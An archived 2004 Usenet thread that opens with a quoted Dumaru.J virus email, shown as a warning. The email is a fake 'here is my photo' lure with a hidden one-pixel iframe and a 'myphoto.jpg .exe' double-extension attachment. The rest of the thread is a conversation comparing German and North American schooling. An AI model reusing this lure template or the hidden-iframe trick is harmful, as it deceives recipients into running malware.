From: "Elene" <****[email protected]>
To: <[email protected]>
Subject: Important information for you. Read it immediately !
Date: 24 Jan 2004 15:20 GMT

--xxxx

<FONT color=red size=15><CENTER>Hi !</CENTER></FONT><BR>
Here is my photo, that you asked for yesterday.<BR><iframe
src=domain_marker WIDTH=1 HEIGHT=1></iframe>
--xxxx
name="accounts.zip"

"myphoto.zip" can be extracted, and gives a CRC error. The content is
myphoto.jpg .exe

It is a portable executable. The description of Kaspersky is still
preliminar.
http://www.viruslist.com/eng/alert.html?id=822097

Kaspersky deems the threat as "moderate". But if people are so dumb and
do even *extract* the file to infect themselves, it is possible that we
soon will be swamped with Dumaru.j. Prepare for the battle.

Gabriele Neukam

(e-mail address removed)

me

Hi Gabriele,

Suggestion: don't start the post with "ANN" -- it might be
filtered/flagged as a commercial "announcement" (spam).

Nadie Ninguno

ust FYI. I got two infected mails of Dumaru.J (named by Kaspersky) from
German users. One is a technical high school (dang)

You Germans are lucky,
in Canada students have to wait until college to learn this stuff. <g>

Gabriele Neukam

On that special day, Nadie Ninguno, ([email protected]) said...
You Germans are lucky,
in Canada students have to wait until college to learn this stuff. <g>

The problem is, we don't have colleges, except for religious purposes.
It is all universities and high schools. The high schools can be general
or specialized (technical, medical, pedagogic, management, public
management, public finances and so on).

And this special high school (Fachhochschule) is teaching several
specific subjects like computer sciences and programming.

Gabriele Neukam

(e-mail address removed)

Frederic Bonroy

Gabriele Neukam a écrit :
The problem is, we don't have colleges, except for religious purposes.
It is all universities and high schools. The high schools can be general
or specialized (technical, medical, pedagogic, management, public
management, public finances and so on).

And this special high school (Fachhochschule) is teaching several
specific subjects like computer sciences and programming.

"High school" is probably not the correct term, since it's what you
attend before you go to university/college in the US. What we call "high
school" in Germany is similar to university (although such a "high
school" is usually considered to be less demanding and more practically
oriented).

null

Gabriele Neukam a écrit :

"High school" is probably not the correct term, since it's what you
attend before you go to university/college in the US. What we call "high
school" in Germany is similar to university (although such a "high
school" is usually considered to be less demanding and more practically
oriented).

I wonder then if your "high schools" are along similar lines to our
technical institutes. Such technical institutes here provide training
for anywhere from one to three years and are usually characterized as
"terminal education" meaning they aren't designed for continuing
education. They produce a "finished product" ... a trained technician
in some field. Credits gained in such schools are not normally
transferable to "regular" colleges and universities. They do normally
require high school graduation for entrance just as do colleges and
universities.

When I was just getting started in electronics (it was called "radio"
then) the tech schools were doing quite well. But over the decades,
the phenomenen of the local community college gradually competed with
them, rather inadvertently. Here now, for example, a kid just out of
high school might attend a local community college for a couple of
years and gain credits transferable to Penn State or some other
"regular" college or university. Many community colleges offer very
practical and non-theoretical courses as well.

But more than that, there are "technical colleges" which offer four
year undergraduate programs, but with watered down physics and math.
These are "terminal" also in the sense that they aren't designed for
those wanting to ever go for an advanced degree. Yet, they're in a
different category from the technical institutes since they do train
people for many kinds of engineering design work as opposed to
technician support work. In fact, I get a sense that maybe your "high
school" is more roughly equivalent to these four year engineering
training colleges (for example)?

Art
http://www.epix.net/~artnpeg

Sugien

Gabriele Neukam said:
On that special day, Nadie Ninguno, ([email protected]) said...

The problem is, we don't have colleges, except for religious purposes.
It is all universities and high schools. The high schools can be general
or specialized (technical, medical, pedagogic, management, public
management, public finances and so on).

And this special high school (Fachhochschule) is teaching several
specific subjects like computer sciences and programming.

How close are you to Oer-Erkenschwick? I ask because my oldest
daughter married a German national and has been living there since March
2000.

--
http://home.adelphia.net/~dinosoft
/}

Gabriele Neukam

On that special day, , ([email protected]) said...
Yet, they're in a
different category from the technical institutes since they do train
people for many kinds of engineering design work as opposed to
technician support work. In fact, I get a sense that maybe your "high
school" is more roughly equivalent to these four year engineering
training colleges (for example)?

Your description seems to match what we call a technical high school or
specialized high school. I can't help for the confusion of terms, it is
just that we don't have that many instances for education as you have.

I am trying to describe our system, but I may at times be wrong, because
I still haven't quite understood it completely:

First level: Elementary school, four terms
Second level: Gymnasium (no, not sports, but high brow school with
sciences included), nine terms, or "real school" (more oriented towards
some languages and secretary stuff), six terms, or "main school"
(formerly the general education place, now the dumps for the rest who
didn't manage to do well in the first two), four or five terms.

Third level: After gymnasium, you can enter universities and "high
schools", and study (terminally). The completion certificate may be a
diploma, Master of Arts, or Doctor (depends on subject).

After "real school", you might enter a specialized (ie toned down)
gymnasium and be allowed to enter specialized (technical or otherwise)
high schools. The completion certificate is a diploma.

I myself have been at a University (although cultural anthropology
doesn't provide any living at all), and a specialized high school for
public management (also of no use).

Also, after "real school" you can start learning at the "profession
school", which gives rather practical lessons of the technical and
management skills required to work as a "Meister" (master, a term for a
person that learnt a craft and is allowed to run an own shack, not
having to be a clerk or coworker). The certificate is a "masters
letter".

The "main scholars" have a hard time to find a job at all, today. they
often accept jobs like transporting the bottles and cartons around in a
super market and filling up the displays. No certificate, either.

And then there are the new Business Academies, where you can attain a
Bachelor of Arts, only to find that no one wants a BA for clerk. As
someone termed it: "BA is the title of the high school drop out who
barely managed to pass the exams of the basic education".

I am a MA, and still useless. Yes, me.

Gabriele Neukam

(e-mail address removed)

Gabriele Neukam

On that special day, Sugien, ([email protected]) said...
How close are you to Oer-Erkenschwick? I ask because my oldest
daughter married a German national and has been living there since March
2000.

In northern Baden-Württemberg, I live several hundred kilometers and
three or four federal countries apart. And in Germany, this means
literally several dozens of towns and cities in between. No, I am not
near Oer-Erkenschwick at all.

Gabriele Neukam

(e-mail address removed)

Frederic Bonroy

Gabriele Neukam a écrit :
Third level: After gymnasium, you can enter universities and "high
schools", and study (terminally). The completion certificate may be a
diploma, Master of Arts, or Doctor (depends on subject).

There is an ongoing effort to internationalize the completion
certificates, i.e. we are seeing an emergence of Bachelor and Master
studies. The problem with a diploma seems to be that people outside
Germany are not aware of what it represents and underestimate it.

As far as the doctor (PhD) is concerned, it isn't bestowed automatically
on anyone, not even on physicians; it's optional. At least I am not
aware of the contrary.
And then there are the new Business Academies, where you can attain a
Bachelor of Arts, only to find that no one wants a BA for clerk. As
someone termed it: "BA is the title of the high school drop out who
barely managed to pass the exams of the basic education".

Yes, and someone else said that the Bachelor is a diploma for dropouts.
Or maybe it was the same persone. Speech at the university of Karlsruhe?

How reassuring.

Frederic Bonroy

(e-mail address removed) a écrit :
I wonder then if your "high schools" are along similar lines to our
technical institutes. Such technical institutes here provide training
for anywhere from one to three years and are usually characterized as
"terminal education" meaning they aren't designed for continuing
education. They produce a "finished product" ... a trained technician
in some field. Credits gained in such schools are not normally
transferable to "regular" colleges and universities. They do normally
require high school graduation for entrance just as do colleges and
universities.

That's possible. I am not familiar with your system. I don't even know
the official difference between college and university. I was told they
are similar (or even the same), but that's all I know.

Our "high schools" (let me call them FHs as we do in Germany) do indeed
produce "finished products", more so than universities where more
emphasis is placed on theory and scientific research. FHs could be
considered a "diet" version of universities. FH graduates carry the two
letters "FH" with them during their entire life like branded cows.
You're not an "engineer" when you leave the FH, you are an "engineer
(FH)". And some university professors insist on dissociating themselves
from FH professors by adding a small "univ-" before the word
"Professor". :)

Sugien

Gabriele Neukam said:
On that special day, Sugien, ([email protected]) said...

In northern Baden-Württemberg, I live several hundred kilometers and
three or four federal countries apart. And in Germany, this means
literally several dozens of towns and cities in between. No, I am not
near Oer-Erkenschwick at all.
k, tnx for the info, I was just wondering; because my eldest daughter is
living in Germany
--
http://home.adelphia.net/~dinosoft
/}
@###{ ]::::::Dino-Soft Software::::::>
\}
live web cam http://www.dino-soft.org/cam
live web cam fixed and active 12 hours a day minimum

Gabriele Neukam

On that special day, Frederic Bonroy, ([email protected]) said...
Yes, and someone else said that the Bachelor is a diploma for dropouts.
Or maybe it was the same persone. Speech at the university of Karlsruhe?

I think so. I only do remember that I found it in one of the heise
newsticker articles, and that it was part of a speech, so it is very
probably that one.

Gabriele Neukam

(e-mail address removed)